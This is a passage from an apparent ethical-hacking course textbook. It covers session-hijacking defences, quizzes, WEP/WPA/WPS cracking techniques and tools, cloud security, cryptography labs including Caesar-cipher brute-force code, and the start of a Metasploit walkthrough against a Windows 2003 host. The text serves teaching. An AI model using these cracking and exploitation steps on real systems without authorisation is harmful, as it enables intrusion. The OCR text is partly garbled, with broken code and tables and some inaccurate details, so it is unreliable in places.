CRIME decrypts HTTPS cookies set by websites to remem ber
authenticated users by means of brute force. The attack code forces the
victim's browser to send specially crafted HTTPS requests to a targeted
website and analyzes the variation in their length after they've been
compressed in order to determine the v alue of the victim's session cookie.
This is possible because SSL/TLS uses a compression algorithm called
DEFLATE, which eliminates duplicate strings.
The attack code can't read the session cookie included in the requests
because of security mechanisms in the browser. However, it can control
the path of every new request and can insert different strings into it in an
attempt to match the value of the cookie.
Session cookie values can be quite long and are made up of uppercase
letters, lowercase letters and digits. As a result, the CRIME attack code
has to initiate a very large number of requests in order to decrypt them,
which can take several minutes.
Prevent session hijacking attacks
HTTPS : The use of HTTPS ensures that there is SSL/TLS encryption
through out the session traffic. Attackers will be unable to intercept the
plaintext session ID, even if the victim’s traffic was monitored. It is
advised to use HSTS (HTTP Strict Transport Security) to guarantee
complete encryption.

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Ethical Hacking Lab

104 HTTP Only : Setting up an HTTP Only attribute prevents access to the
stored cookies from the client -side scripts. This can prevent attackers from
deploying XSS attacks that rely on injecting Java Scripts in the browser.
System Updates : Install reputable antivirus software which can easily
detect viruses and protect you from any type of malware (including the
malware attackers use to perform session hijacking). Keep your systems
up to date by setting up automatic updates on all your devices.
Session Management : In order to offer sufficient security, website
operators can incorporate web frameworks, instead of inventing their own
session management systems.
Session Key : It is advised to regenerate session keys after their initial
authentication. This renders the session ID extracted by attack ers useless
as the ID changes immediately after authentication.
Identity Verification : Perform additional identity verification from the
user beyond the session key. This includes checking the user's usual IP
address or application usage patterns.
Public H otspot : Avoid using public WiFi to protect the integrity of your
sessions and opt for secure wireless networks.
VPN : Use a Virtual Private Network (VPN) to stay safe from session
hijackers. A VPN masks your IP and keeps your session protected by
creating a “private tunnel” through which all your online activities will be
Phishing Scam: Avoiding falling for phishing attacks. Only click on links
in an email that you have verified to have been sent from a legitimate
1. What is SQL Injection?
2. How common are SQL Injections?
3. How dangerous are SQL Injections?
4. How to detect SQL Injections?
5. How to prevent SQL Injections?
6. What is an error -based SQL injection?
7. What is a UNION -based SQL injection?
8. What is a boolean -based (content -based) bli nd SQL injection?
9. What is a time -based blind SQL injection?
10. What is an out -of-band SQL injection?

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Sql injection and Session
105 6.4 QUIZ
1. What is the attack called “evil twin”?
a) Rogue access point
b) ARP poisoning
c) Session hijacking
d) MAC spoofing
2. What are the forms of password crackin g techniques?
a) Attack Syllable
b) Attack Brute Forcing
c) Attacks Hybrid
d) All of the above
3. what is the primary goal of an Ethical Hacker ?
a) Avoiding detection
b) Testing security controls
c) Resolving security vulnerabilities
d) Determining return on investment for security measures
4. What is the first phase of hacking?
a) Maintaining access
b) Gaining access
c) Reconnaissance
d) Scanning
5. Which type of hacker represents the highest risk to your network?
a) Black -hat hackers
b) Grey -hat hackers
c) Script kiddies
d) Disgruntled employees
6. Hacki ng for a cause is called ..................
a) Hacktivism
b) Black -hat hacking

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Ethical Hacking Lab

106 c) Active hacking
d) Activism
7. When a hacker attempts to attack a host via the Internet it is known as
what type of attack?
a) Local access
b) Remote attack
c) Internal attack
d) Physical access
8. W hich are the four regional Internet registries?
9. What port number does HTTPS use?
a) 53
b) 443
c) 80
d) 21
10. Banner grabbing is an example of wha t?
a) Footprinting
b) Active operating system fingerprinting
c) Passive operating system fingerprinting
d) Application analysis
11. What does the TCP RST command do?
a) Restores the connection to a previous state
b) Finishes a TCP connections
c) Resets the TCP connection
d) Starts a TCP connection
12. A packet with all flags set is which type of scan?
a) Full Open

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Sql injection and Session
107 b) XMAS
c) TCP connect
d) Syn scan
13. Why would an attacker want to perform a scan on port 137?
a) To check for file and print sharing on Windows systems
b) To discover proxy servers on a network
c) To discover a target system with the NetBIOS null session
d) To locate the FTP service on the target host
14. Which tool can be used to perform a DNS zone transfer on Windows?
a) DNSlookup
b) nslookup
c) whois
d) ipconfig
15. What is the best rea son to implement a security policy?
a) It makes security harder to enforce.
b) It removes the employee’s responsibility to make judgments.
c) It increases security.
d) It decreases security.
16. What does the term "Ethical Hacking" mean?
a) Someone who is using his/her s kills for defensive purposes.
b) Someone who is hacking for ethical reasons.
c) Someone who is using his/her skills for ethical reasons.
d) Someone who is using his/her skills for offensive purposes
17. What are the two basic types of attacks ?
a) Active
b) Passive
c) DoS
d) Both 1 & 2

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Ethical Hacking Lab

108 18. What is the major difference between an 'Ethical Hacker' and a
a) The ethical hacker has authorization from the owner of the
b) The ethical hacker is just a cracker who is getting paid.
c) The ethical hacker does not use the same te chniques or skills as a
d) The ethical hacker does it strictly for financial motives unlike a
19. What is the attack called “evil twin”?
a) MAC spoofing
b) Session hijacking
c) Rogue access point
d) ARP poisoning
20. What is the maximum length of an SSI D?
a) Thirty -two characters
b) Sixteen characters
c) Sixty -four characters
d) Eight characters
21. Which wireless mode connects machines directly to one another,
without the use of an access point?
a) Ad hoc
b) Point to point
c) Infrastructure
d) BSS
22. The process of profession ally or ethically hacking a message is called
a) Cryptography
b) Encryption
c) Decryption
d) Penetration Testing
23. Ethical hacking is also known as .................

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Sql injection and Session
109 a) White hat Hacking
b) Penetration Testing
c) Both white hat hacking & penetration testing
d) None of the above
24. What are the advantages of Ethical Hacking?
a) It is used to test how good security is on your network.
b) It is used to recover the lost of information, especially when you lost
your password.
c) It is used to perform penetration testing to increase the secur ity of
the computer and network.
d) All of the above
25. Which character is typically used first by the penetration tester?
a) Semicolon
b) Dollar sign
c) Single quote
d) None of the above
1. Running an SQL Injection Attack - .
2. What is SQL Injection? | SQL Injection Tutorial | Cybersecurity
Training | Edureka.
3. SQL Injection | Complete Guide.
4. SQL injection | Web attacks.
5. SQL Injection Attacks - Explained in 5 Minutes.
6. What is SQL Injection ? How to prevent SQL Injection Attack.
7. SQL Injection Preventio n: Security Simplified.
8. How to prevent SQL Injection? fhtUG8

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Ethical Hacking Lab

110 9. Session Hijacking Attack | Session ID and Cookie Stealing.
10. Session Hijacking. https :// -
11. Session Hijacking Tutorial. -zGNmTE
12. Session Hijacking.
13. Ethical Hacking - What is Session Hijacking.
14. Session Hijacking: How To Steal Cookies Of Any User In Your
Netwo rk & Use Them To Login.
15. Session Hijacking | What is Session Hijacking? | InfosecTrain.
16. Session Fixation Attack.
17. Cookie Stealing – Computerphile.
18. Session Hijacking. -
1. Ethical Hacking - SQL Injection Attack. Coursesity. -detail/ethical -hacking ---sql-injection -attack -
2. SQL Injection Attacks. Coursera. -patching/sql -injection -attacks -
3. Hacking and Patching. Coursera. -patching
4. SQL Inj ections Unlocked - SQLi Web Attacks. Udemy. -injections -unlocked -sqli-web-attacks/
1. ty/sql -injection/
2. -injection2/
3. -website -
using -sql-injection -step-by-step-guide.html

Page 111

Sql injection and Session
111 4.
5. https://en.wikip
9. -session -hijacking
10. -hijacking -and-how-to-
prevent -it


Page 112

112 7
Unit Structure
7.0 Wireless Network Hacking
7.1 Cloud Computing Security
7.2 Cryptography
7.3 Using Cryptool to Encrypt and Decrypt Password
7.4 Implement Encryption and Decryption Using Ceaser Cipher
7.5 Video Links
7.6 References
Due to the increasing usage of wireless networks, wireless attacks are
rising at an exponential pace. Wifi networks are commonly vulnerable to
hacking as wireless signals can be picked up and exploi ted anywhere and
by anyone.

Fig 1. Wireless Router
In a wireless network, we have Access Points which are extensions of
wireless ranges that behave as logical switches.

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Wireless network hacking,
cloud computing

Wireless hacking can be defined as an attack on wireless networks or
access points that offer confidential information such as authentication
attacks, wifi passwords, admin portal access, and other similar data.
Wireless hacking is performed for gaining unauthorized access to a private
wifi network.
The increase in WiFi usage has led to increased wireless attacks. Any
attack on wireless networks or access points that provide substantial
information is referred to as wireless hacking. This information can be in
the form of WiFi passwords, admin portal access, authentication attacks,
etc. T o understand wireless hacking, one of the most important things to
understand are the protocols involved in wireless networks. Attacks are
mostly made on the internal steps of the protocol stack. IEEE 802.11
specifies the standards for wireless networks;
WEP (Wired Equivalent Privacy): WEP uses a 40 -bit key and a 24 -bit
initialization vector. It uses RC4 for confidentiality and CRC 32 for
integrity. Since the initialization vector is of 24 bits, there is a high
probability that the same key will be repeat ed after every 5000 packets.
WEP is a depreciated algorithm due to the various vulnerabilities
identified and the fact that it can be cracked very easily.
WPA and WPA2: WPA was introduced as a temporary solution for the
devices that did not support WPA2. W PA has now been broken and
depreciated. The WPA2 is considered to be the most secure to date. The
tools discussed further in the article will also cover details on how to
attack WPA and WPA2 but the success of an attack depends on the time
and the computin g power.
WEP cracking technique: WEP uses a 40 -bit key that is 8 characters
long. Once enough data packets are captured, breaking this key should not
take more than a few minutes.
WPA/WPA2 cracking technique: Our devices have wireless passwords
stored so that we do not enter the password on the same device again and
again. The attackers take advantage of this by forcefully de -authenticating
all the devices on the network. The devices will try to auto -connect to the
access point by comp leting the 4 -way handshake. This handshake is

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Ethical Hacking Lab

114 recorded and has the hashed password. The hashed password can be brute -
forced by using a rainbow table.
WPS cracking: This technology uses an 8 digit pin to connect to the
wireless router. Brute forcing the 8 digit pin will give access to the router.
Various tools use various optimization techniques to increase the speed of
this attack and crack the key in a couple of hours.
Wireless Hacking Tools
1. Aircrack -ng
2. AirSnort
3. Kismet
4. Cain and Abel
5. CoWPAtty
6. OmniPeek
7. Airjack
8. InSSIDer
9. WepAttack
10. Reaver
11. Fern Wifi Cracker
12. NetStumbler
13. Wireshark
14. Airgeddon
15. Yersinia
17. IKECrack
18. Network Mapper (NMAP)
19. Pyrit
20. WepDecrypt
21. Wifite
22. KisMac
23. Wifiphisher
24. CommView for WiFi
25. Cloudcracker

Page 115

Wireless network hacking,
cloud computing
Cloud se curity, also known as cloud computing security, is a collection of
security measures designed to protect cloud -based infrastructure,
applications, and data. These measures ensure user and device
authentication, data and resource access control, and data pr ivacy
protection. They also support regulatory data compliance. Cloud security
is employed in cloud environments to protect a company's data from
distributed denial of service (DDoS) attacks, malware, hackers, and
unauthorized user access or use.
Types of cloud environments
When you're looking for cloud -based security, you'll find three main types
of cloud environments to choose from. The top options on the market
include public clouds, private clouds, and hybrid clouds. Each of these
environments has diffe rent security concerns and benefits, so it's important
to know the difference between them:
1. Public clouds
Public cloud services are hosted by third -party cloud service providers. A
company doesn't have to set up anything to use the cloud, since the
provider handles it all. Usually, clients can access a provider's web
services via web browsers. Security features, such as access control,
identity management, and authentication, are crucial to public clouds.
2. Private clouds
Private clouds are typically mo re secure than public clouds, as they're
usually dedicated to a single group or user and rely on that group or user's
firewall. The isolated nature of these clouds helps them stay secure from
outside attacks since they're only accessible by one organizatio n.
3. Hybrid clouds
Hybrid clouds combine the scalability of public clouds with the greater
control over resources that private clouds offer. These clouds connect
multiple environments, such as a private cloud and a public cloud, that can
scale more easily based on demand.
Cloud security is critical since most organizations are already using cloud
computing in one form or another. This high rate of adoption of public
cloud services is reflected in Gartner’s recent prediction that the
worldwid e market for public cloud services will grow 23.1% in 2021.
A crucial component of cloud security is focused on protecting data and
business content, such as customer orders, secret design documents, and
financial records. Preventing leaks and data theft i s critical for maintaining

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Ethical Hacking Lab

116 your customers’ trust and protecting the assets that contribute to your
competitive advantage. Cloud security's ability to guard your data and
assets makes it crucial to any company switching to the cloud.
Security in cloud computing is crucial to any company looking to keep its
applications and data protected from bad actors. Maintaining a strong
cloud security posture helps organizations achieve the now widely
recognized benefits of cloud computing. Cloud security comes with its
own advantages as well, helping you achieve lower upfront costs, reduced
ongoing operational and administrative costs, easier scaling, increased
reliability and availability, and improved DDoS protection.
1. Lower upfront costs
One of the biggest advantages of using cloud computing is that you don't
need to pay for dedicated hardware. Not having to invest in dedicated
hardware helps you initially save a significant amount of moneyand can
also he lp you upgrade your security.
2. Reduced ongoing operational and administrative expenses
Cloud security can also lower your ongoing administrative and operational
expenses. A CSP will handle all your security needs for you, removing the
need to pay for sta ff to provide manual security updates and
3. Increased reliability and availability
You need a secure way to immediately access your data. Cloud security
ensures your data and applications are readily available to authorized
4. Cent ralized security
Cloud computing gives you a centralized location for data and
applications, with many endpoints and devices requiring security. Security
for cloud computing centrally manages all your applications, devices, and
data to ensure everything is protected.
5. Greater ease of scaling
Cloud computing allows you to scale with new demands, providing more
applications and data storage whenever you need it. Cloud security easily
scales with your cloud computing services. When your needs change, the
centralized nature of cloud security allows you to easily integrate new
applications and other features without sacrificing your data's safety.

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Wireless network hacking,
cloud computing
117 6. Improved DDoS protection
Distributed Denial of Service (DDoS) attacks are some of the biggest
threats to clou d computing. These attacks aim a lot of traffic at servers at
once to cause harm.
Companies depend more on cloud storage and processing, but CIOs and
CISOs may have reservations about storing their content with a thir d
party. They're typically apprehensive that abandoning the perimeter
security model might mean giving up their only way of controlling access.
This fear turns out to be unfounded.
CSPs have matured in their security expertise and toolsets over the last
decade. CSPs are acutely aware of the impact a single incident may have
on their customers' finances and brand reputation, and they go to great
lengths to secure data and applications. These providers hire experts,
invest in technology, and consult with cust omers to help them understand
cloud security. The cloud offers opportunities for centralized platforms,
provides architectures that reduce the surface area of vulnerability, and
allows for security controls to be embedded in a consistent manner over
multip le layers.
Choosing a CSP

Fig 2. Choosing a Cloud Service Provider
1. Improved security and protection
IT teams can secure access to content with granular permissions, SSO
support for all major providers, native passwo rd controls, and two -factor
authentication for internal and external users. Companies can rely on
enterprise -grade infrastructure that’s scalable and resilient — data centers
are FIPS 140 -2 certified, and every file is encrypted using AES 256 -bit
encryptio n in diverse locations. Customers also have the option to manage
their own encryption keys for complete control.

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Ethical Hacking Lab

118 2. Simpler compliance and governance
Box provides simplified governance and compliance with in -region
storage. Our platform also features easy -to-configure policies that retain,
dispose of, and preserve content. These policies help you avoid fines and
meet the most demanding global compliance and privacy requirements.
3. Greater threat detection and data leakage prevention
The Content Cloud offe rs native data leakage prevention and threat
detection through Box Shield, enabling you to place precise controls
closer to your sensitive data. These controls prevent leaks in real time by
automatically classifying information, while maintaining a simple,
frictionless experience for end users.
4. More secure content migration
Deciding to transfer your data and content to the cloud is a big decision,
and you'll want the transition to be as safe as possible. Box Shuttle makes
the move to the Content Cloud si mple and secure. Migrating your data to
the Content Cloud means you'll have all the benefits of our threat
detection and security protections, and our team will ensure the data
transfer process is as secure as possible.
5. Safer signature collection
Collec ting and managing signatures is essential to many businesses. Box
Sign features native integration to put all your e -signatures where your
content lives, allowing users to have a seamless signing experience. These
e-signature capabilities also come with a secure content layer to ensure
critical business documents aren't compromised during the signing
Cryptography is the study of secure communications techniques that allow
only the sender and intended recipient of a message to view its contents.
The term is derived from the Greek word kryptos, which means hidden.
Techniques used For Cryptography:
In today’s age of computers cryptography is often associated with the
process where an ordinary plain text is converted to cipher text which i s
the text made such that intended receiver of the text can only decode it and
hence this process is known as encryption. The process of conversion of
cipher text to plain text this is known as decryption.
Features Of Cryptography are as follows:
Confident iality:
Information can only be accessed by the person for whom it is intended
and no other person except him can access it.

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Wireless network hacking,
cloud computing
119 Integrity:
Information cannot be modified in storage or transition between sender
and intended receiver without any addition to inf ormation being detected.
The creator/sender of information cannot deny his intention to send
information at later stage.
The identities of sender and receiver are confirmed. As well as
destination/origin of information is c onfirmed.
In general there are three types Of cryptography:
Symmetric Key Cryptography:
Symmetric Key Systems are faster and simpler but the problem is that
sender and receiver have to somehow exchange key in a secure manner.
The mos t popular symmetric key cryptography system is Data Encryption
Hash Functions:
A hash value with fixed length is calculated as per the plain text which
makes it impossible for contents of plain text to be recovered.
Asymmetric Key Cryptograph y:
A public key is used for encryption and a private key is used for
decryption. Public key and Private Key are different. Even if the public
key is known by everyone the intended receiver can only decode it
because he alone knows the private key.
Cryptanalysis is the art of trying to decrypt the encrypted messages
without using the key that was used to encrypt the messages.
Cryptanalysis uses mathematical analysis and algorithms to decipher the
ciphers. It is used to breach security systems to gain access to encrypted
content and messages even the cryptographic key is unknown.
The success of cryptanalysis attacks depends
❖ Amount of time available
❖ Computing power available
❖ Storage capacity available

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Ethical Hacking Lab

120 Commonly used Cryptanalysis attacks
❖ Brute fo rce attack – this type of attack uses algorithms that try to guess
all the possible logical combinations of the plaintext which are then
ciphered and compared against the original cipher.
❖ Dictionary attack – this type of attack uses a wordlist in order to fi nd a
match of either the plaintext or key. It is mostly used when trying to
crack encrypted passwords.
❖ Rainbow table attack – this type of attack compares the cipher text
against pre -computed hashes to find matches.
Encryption Algorithms
MD5 – this is the ac ronym for Message -Digest 5. It is used to create 128 -
bit hash values. Theoretically, hashes cannot be reversed into the original
plain text. MD5 is used to encrypt passwords as well as check data
❖ SHA – this is the acronym for Secure Hash Algorit hm. SHA
algorithms are used to generate condensed representations of a
message (message digest). It has various versions such as;
❖ SHA -0: produces 120 -bit hash values. It was withdrawn from use
due to significant flaws and replaced by SHA -1.
❖ SHA -1: produces 160-bit hash values. It is similar to earlier versions
of MD5. It has cryptographic weakness and is not recommended for
use since the year 2010.
❖ SHA -2: it has two hash functions namely SHA -256 and SHA -512.
SHA -256 uses 32 -bit words while SHA -512 uses 64 -bit words.
❖ SHA -3: this algorithm was formally known as Keccak.
❖ RC4– Brute force RC4 algorithm is used to create stream ciphers. It
is mostly used in protocols such as Secure Socket Layer (SSL) to
encrypt internet communication and Wired Equivalent Privacy
(WEP) to secure wireless networks.
❖ BLOWFISH – this algorithm is used to create keyed, symmetrically
blocked ciphers. It can be used to encrypt passwords and other data.
Create a simple cipher using the RC4 brute force tool and then attempt to
decrypt it using brute -force attack.
Creating the RC4 stream cipher
Step 1) Download and intall Crypt Tool

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Wireless network hacking,
cloud computing
121 We will use Cryp Tool 1 as our cryptology tool. Cryp Tool 1 is an open
source educational tool for crypto logical studies. You can download it
Step 2) Open Crypt Tool and replace the text
We will encrypt the following phrase
Never underestimate the determination of a kid who is time -rich and cash -
We will use 00 00 00 as the encryption key.
● Open CrypTool 1

● Replace the text with Never underestimate the determination of a kid
who is time -rich and cash -poor

Step 3) Encrypt the text
● Click on Encrypt/Decrypt menu

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Ethical Hacking Lab

122 ● Point to Symmetric (modern) then select RC4 as shown above
● The following window will appear

Step 4) Select encryption key
● Select 24 bits as the encryption key
● Set the value to 00 00 00
● Click on Encrypt button
● You will get the following stream cipher

Attacking the stream cipher
Step 5 ) Start Analysis
Click on Analysis menu

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Wireless network hacking,
cloud computing
123 Point to Symmetric Encryption (modern) then select RC4 as shown
You will get the following window

Remember the assumption made is the secret key is 24 bits. So make
sure you select 24 bits as the key length .
Click on the Start button. You will get the following window

Note: the time taken to complete the Brute -Force Analysis attack
depends on the processing capacity of the machine been used and the key
length. The longer the key length, the longer it takes to complete the
Step 6) Analyse the results
● When the analysis is complete, you will get the following results.

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Ethical Hacking Lab


● Note: a lower Entropy number means it is the most likely correct
result. It is possible a higher than the lowest found Entropy value c ould be
the correct result.
● Select the line that makes the most sense then click on Accept
selection button when done
Algorithm of Caesar Cipher
The algorithm of Caesar cipher holds the following
features −
Caesar Cipher Technique is the simple and easy method of encryption
It is simple type of substitution cipher.
Each letter of plain text is replaced by a letter with some fixed number
of positions down with alphabet.
The following diag ram depicts the working of Caesar cipher algorithm
implementation −

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Wireless network hacking,
cloud computing
125 The program implementation of Caesar cipher algorithm is as follows –
Python code
def encrypt(text,s):
result = ""
# transverse the plain text
for i in range(len(text)):
char = text[i]
# Encrypt uppercase characters in plain text

if (char.isupper()):
result += chr((ord(char) + s -65) % 26 + 65)
# Encrypt lowercase characters in plain text
result += chr((ord(char) + s - 97) % 26 + 97)
return result
#check the above function
s = 4

print "Plain Text : " + text
print "Shift pattern : " + str(s)
print "Cipher: " + encrypt(text,s)
You can see the Caesar cipher, that is the output as
shown in the following image −

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Ethical Hacking Lab

126 Explanation
The plain text character is traversed one at a time.
For each character in the given plain text, transform the given
character as per the rule depending on the procedure of encryption
and decryption of text.
After the steps is followed, a new string is generated which is referred
as cipher text.
Hacking of Caesar Cipher Algorithm
The cipher text can be hacked with various possibilities. One of such
possibility is Brute Force Technique, which involves trying every
possi ble decryption key. This technique does not demand much effort and
is relatively simple for a hacker.
The program implementation for hacking Caesar
cipher algorithm is as follows −
message = 'GIEWIVrGMTLIVrHIQS' #encrypted message

for key in range (len(LETTERS )):
translated = ''
for symbol in message :
if symbol in LETTERS :
num = LETTERS .find(symbol )
num = num - key
if num < 0:
num = num + len(LETTERS )
translated = translated + LETTERS [num]
translated = translated + symbol
print ('Hacking ke y #%s: %s' % (key, translated ))

Page 127

Wireless network hacking,
cloud computing

1. Hacking Wireless Networks. -
2. How Hackers crack any WiFi password.
3. How to Hack Wi Fi Passwords.
4. What is Cloud Security and Why Do You Need
5. What is Cloud
6. Cloud Computing - Security .
7. Cryptography Full Course.
8. What is
cryptography? -
science/cryptography/crypt/v/intro -to-cryptography
9. Cryptography: Crash C ourse Computer Science.

Page 128

Ethical Hacking Lab

1. -wireless -
hacking -tools
3. n-in/resources/what -is-cloud -security
5. -center/definitions/what -is-
6. -and-its-types/
7. -to-make -your-data-safe-using -


Page 129

129 8
Unit Structure
8.1 Introduction
8.2 Working with Metasploit
8.3 Pen Testing using Metasploit
8.4 Summary
8.5 References
8.6 Conclusion
When I say "Penetration Testing tool" the first thing that comes to your
mind is the world's largest Ruby project, with over 700,000 lines of
code 'Metasploit' [Reference 1 ]. No wonder it had become the de -facto
standard for penetration testing and vulnerability development with more
than one million unique downloads per year and the world's larg est, public
database of quality assured exploits.
The Metasploit Framework is a program and sub -project developed by
Metasploit LLC. It was initially created in 2003 in the Perl programming
language, but was later completely re -written in the Ruby Programm ing
Language. With the most recent release (3.7.1) Metasploit has
taken exploit testing and simulation to a complete new level which has
muscled out its high priced commercial counterparts by increasing the
speed and lethality of code of exploit in shortes t possible time. In this
article, I will walk your through detailed step by step sequence of
commands along with graphical illustrations to perform effective
penetration testing using Metasploit framework.
Metasploit is simple t o use and is designed with ease -of-use in mind to aid
Penetration Testers. Metasploit Framework follows these common steps
while exploiting a any target system
1. Select and configure the exploit to be targeted. This is the code that
will be targeted toward a system with the intention of taking advantage
of a defect in the software. Validate whether the chosen system is
susceptible to the chosen exploit..
2. lect and configure a payload that will be used. This payload represents
the code that will be run on a syst em after a loop -hole has been found
in the system and an entry point is set.t.

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Ethical Hacking Lab

130 3. Select and configure the encoding schema to be used to make sure that
the payload can evade Intrusion Detection Systems with ease.
4. Execute the exploit.
I will be taking you thro ugh this demo in BackTrack 5 [Reference 2 ], so
go ahead and download that if you don't already have it. The reason for
using BackTrack 5 is that it comes w ith perfect setup for Metasploit and
everything that Pen Testing person ever need.
Metasploit framework has three work environments, the msfconsole , the
msfcli interface and the msfweb interface. However, the primary and the
most preferred work area is the 'msfconsole'. It is an efficient command -
line interface that has its own command set and environment system.
Before executing your exploit, it is useful to understand what some
Metasploit commands do. Below are some of the commands that you will
use most. Graphical explanation of their outputs would be given as and
when we use them while exploiting some boxes in later part of the article.
1. search : Typing in the command 'search' along with the
keyword lists out the various possible exploits that ha ve that
keyword pattern.
2. show exploits: Typing in the command 'show exploits' lists out the
currently available exploits. There are remote exploits for various
platforms and applications including Windows, Linux, IIS, Apache,
and so on, which help to test the flexibility and understand the
working of Metasploit.
3. show payloads: With the same 'show' command, we can also list the
payloads available. We can use a 'show payloads' to list the
4. show options: Typing in the command 'show options' will show you
options that you have set and possibly ones that you might have
forgotten to set. Each exploit and payload comes with its own
options that you can set.
5. info : If you want specific information on an exploit
or payload, you are able to use t he 'info' command. Let's say we want
to get complete info of the payload 'winbind'. We can use 'info
payload winbind'.
6. use : This command tells Metasploit to use the
exploit with the specified name.
7. set RHOST : This command wi ll instruct
Metasploit to target the specified remote host.
8. set RPORT : This command sets the port that
Metasploit will connect to on the remote host.
9. set PAYLOAD : This command sets the
payload that is used to a generic payload that will give you a shell
when a service is exploited.

Page 131

Penetration testing using
metasploit and metasplo itable
131 10. set LPORT : This command sets the port number that
the payload will open on the server when an exploit is exploited. It is
important that this port number be a port that can be op ened on the
server ( is not in use by another service and not reserved for
administrative use), so set it to a random 4 digitnumber greater than
1024, and you should be fine. You'll have to change the number each
time you successfully exploit a servi ce as well.
11. exploit: Actually exploits the service. Another version of exploit,
rexploit reloads your exploit code and then executes the exploit. This
allows you to try minor changes to your exploit code without
restarting the console
12. help: The 'help' comm and will give you basic information of all the
commands that are not listed out here.
Now that you are ready with all the basic commands you need to launch
your exploit, lets get in action with live target system using Metasploit.
Here is the demonstration of pen testing a vulnerable target system using
Metasploit with detailed steps.
Victim Machine
OS: Microsoft Windows Server 2003
Attacker (Our) Machine
OS: Backtrack 5
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011
i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0 -dev
Our objective here is to gain remote access to given target which is
known to be running vulnerable Windows 2003 Server .
Here are the detailed steps of our attack in action,
Step 1
x root@bt: -
File Edit View Terminal Help root@bt: -# nmap
Starting Nmap 5.51 ( ) at 2011 -06-20 23:58 IST
Nmap scan report for Host is up (0.0011s late ncy).
Not shown: 995 closed ports
135/tcp open msrpc
139/tcp open netbios -ssn
445/tcp open microsoft -ds
1025/tcp open NFS -or-IIS
1026/tcp open LSA -or-nterm
MAC Address: 00:0C:29:08:08:30 (VMware)
backttrack Nmap done: 1 IP address (1 hos t up) scanned in 1.66 seconds root@bt:~#

Page 132

Ethical Hacking Lab

132 Perform an Nmap [Reference 3 ] scan of the remote server

The output of the Nmap scan shows us a ra nge of ports open which can be
seen below in Figure 1
We notice that there is port 135 open. Thus we can look for scripts in
Metasploit to exploit and gain shell access if this server is vulnerable.
Step 2:
Now on your BackTrack launch msfconsole as shown below
Application > BackTrack > Exploitation Tools > Network Exploit Tools >
Metasploit Framework > msfconsole
During the initialization of msfconsole, standard checks are performed. If
everything works out fine we will see the welcome screen as shown

✓x Terminal
File Edit View Terminal Help
=[metasploit v3.8.0 -dev [core: 3.8 api:1.0]
-=[ 696 exploits 358 auxiliary - 51 post
-=[ 224 payloads 27 encoders - 8 nops
=[ svn r12930 updated 9 days ago (2011.06.12)
Warning: This copy of the Metasploit Framework was last updated days ago.
We recommend that you update the framework at least every other day. For
information on updating your copy of Metasploit, please see:
msf > I

Step 3:
Now, we k now that port 135 is open so, we search for a related RPC
exploit in Metasploit.
To list out all the exploits supported by Metasploit we use the "show
exploits" command. This exploit lists out all the currently available
exploits and a small portion of it is shown below

Page 133

Penetration testing using
metasploit and metasplo itable
133 File Edit View Terminal Help
windows/http/maxdb_webdbm_get_overflow 2005 -04-26 Good MaxDB WebDBM GET Buffer
windows/http/mcafee_epolicy_source 2006 -07-17 Average McAfee ePolicy Orchestrat or /
WorldClient form2raw.cgi St
windows/http/mdaemon_worldclient form2raw 2003 -12-29 Gr eat MDaemon <= 6.8.5 Minishare 1.4.1
Buffer Overflow
windows/http/navicopa_get_overflow 2004 -11-07 Average great NaviCOPA 2.0.1 URL
Handling Buffer Overflow Novell iManager getMultiPartParameters Arbit
windows/http/nove ll_imanager upload 2006 -09-28 Excellent average Novell Messenger Server 2.0
Accept -Language Now SMS/MMS Gateway Buffer Overflow
windows/http/nowsms 2010 -10-01 great Oracle 9i XDB HTTP P ASS
Overflow (win32) average PeerCast <= 8.1216 URL Handling Buffer Overf
windows/http/oracle9i_xdb_pass 2006 -04-13 average Private Wire Gateway Buffer Overflow
windows/http/peercast_url 2008 -02-19 average PSO Proxy v0.91 Stack Buffer
windows/http/psoproxy91_overflow 2003 -08-18 normal Sambar 6 Search Results Buffer
windows/http/sambar6 search results 2006 -03-08 great SAP DB 7 .4 WebTools Buffer
windows/http/savant_31_overflow 2006 -06-26 great Savant 3.1 Web Server Overflow
windows/http/servu_session_cookie 2004 -02-20 good Rhinosoft Serv -U Session Cookie
Buffer Over f
windows/http/shoutcast format 2003 -06-21 average SHOUTcast DNAS/win32 1.9.4 File
Request Form
windows/http/shttpd_post 2007 -07-05 average SHTTPD <= 1.34 URI -Encoded POST
Request Over
windows/http/steamcast_useragent 2002 -09-10 average Streamcast <= 6.9.75 HTTP User -
Agent Buffer
windows/http/sybase_easerver 2009 -11-01 average Sybase EAServer 5,2 Remote Stack
Buffer Over
windows/ht tp/trendmicro_officescan 2004 -12-23 average TrackerCam PHP Argument Buffer
windows/http/webster http 2005 -07-25 good Trend Micro OfficeScan Remote Stack
Buffer 0 Webster HTTP Server GE T Buffer Overflow
windows/http/zenworks_uploadservlet 2005 -02-18 average Xitami 2.5c2 Web Server If -Modified -
Since Ov Novell ZENworks Configuration Management Rem

windows/iis/iis_webdav_upload_asp 2007-06-28 excellent Microsoft IIS WebDAV Write Access
Code Execu
windows/iis/ms01_026_dbldecode 2002 -12-02 good Microsoft IIS 5.0 Printer Host Header
windows/iis/ms01_033_idq 2007 -09-24 e xcellent Microsoft IIS/PWS CGI Filename Double
windows/iis/ms03 007_ntdll_webdav 1994 -01-01 good Microsoft IIS 5.0 IDO Path Overflow
windows/imap/eudora list 2001 -05-01 great Microsoft II S 5.0 WebDAV ntdll.dll Path

Page 134

Ethical Hacking Lab

134 As you may have noticed, the default installation of the Metasploit
Framework 3.8.0 -dev comes with 696 exploits and 224 payloads , which
is quite an impressive stockpile thus finding a specific exploit from this
huge list w ould be a real tedious task. So, we use a better option. You can
either visit the link or another alternative
would be to use the "search ""command in Metasploit to
search for related exploits for RPC.command in Metasploit to search for
related exploits for RPC.
In msfconsole type "search dcerpc" to search all the exploits related to
dcerpc keyword as that exploit can be used to gain access to the server
with a vulnerabl e port 135. A list of all the related exploits would be
presented on the msfconsole window and this is shown below in figure 5.
File Edit View Terminal Help
nsf> search dcerpc
Matching Modules
Name Disclosure Date Rank Description =========== =================== ========= ===================
auxiliary/scanner/dcerpc/endpoint_mapper normal Endpoint
Mapper Service Discovery
auxiliary/scanner/dcerpc/hidden normal Hidden
DCERPC Service Discovery
auxiliary/scanner/dcer pc/management normal Remote
Management Interface Discovery
auxiliary/scanner/dcerpc/tcp_dcerpc_auditor normal DCERPC TCP
Service Auditor
auxiliary/scan ner/smb/pipe_ dcerpc_auditor normal SMB Session
Pipe DCERPC Auditor
